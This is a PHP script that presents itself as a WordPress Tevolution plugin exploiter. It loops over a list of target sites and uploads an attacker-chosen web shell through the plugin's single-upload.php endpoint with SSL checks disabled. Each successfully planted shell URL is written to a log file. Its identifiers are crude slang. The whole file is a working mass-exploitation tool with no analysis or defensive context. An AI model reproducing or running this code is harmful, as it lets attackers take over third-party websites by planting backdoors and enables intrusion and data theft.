<?php print" Wordpress Tevolution Plugins Exploiter by Synchronizer - Stupidc0de Family "; error_reporting(0); set_time_limit(0); if(!file_exists($argv[1])){ die(' File Not Found usage: php tev.php list.txt '); } $xnxx=@fopen('logs.html','a+'); $get=file_get_contents($argv[1]); $ex=explode("\n",$get); $c=file($argv[1]); echo"Total target : ".count($c)."\n\n"; foreach($c as $site){ echo "xploit site : $site"; $site=trim($site); $kontolmu = 'shell.php'; # CHANGE YOUR SHELL HERE BRO $isep = '/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php'; echo kirim_jembut($site,$kontolmu,$isep); } function cukur_abis($jembut) { $jembut = str_replace('["','',$jembut); $jembut = str_replace('"]','',$jembut); return $jembut; } function tarik_jembut($listjembut) { $pangkas=explode("\r\n",$listjembut); return $pangkas; } function kirim_jembut($alamat_janda, $memeknya, $jilat) { $file = realpath($memeknya); $ch = curl_init($alamat_janda.$jilat); curl_setopt($ch, CURLOPT_POST, 1); $stupidc0de['jembutfile'] = new CurlFile($file, 'text/html'); curl_setopt($ch, CURLOPT_POSTFIELDS, $stupidc0de); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $respon_janda = curl_exec($ch); curl_close ($ch); if(preg_match('/'.$memeknya.'/',$respon_janda)){ $hasil = ''.cukur_abis($respon_janda).''; $def = "SUCCESS"; $xnxx=@fopen('logs.html','a+'); fwrite($xnxx,"$alamat_janda/wp-content/themes/Directory/images/tmp/$hasil"."<br>"); } else { $hasil = 'NULL'; $def = "FAILED"; } echo" Status = $def \n Shell = $hasil\n"; } print " result saved in logs.html "; ?>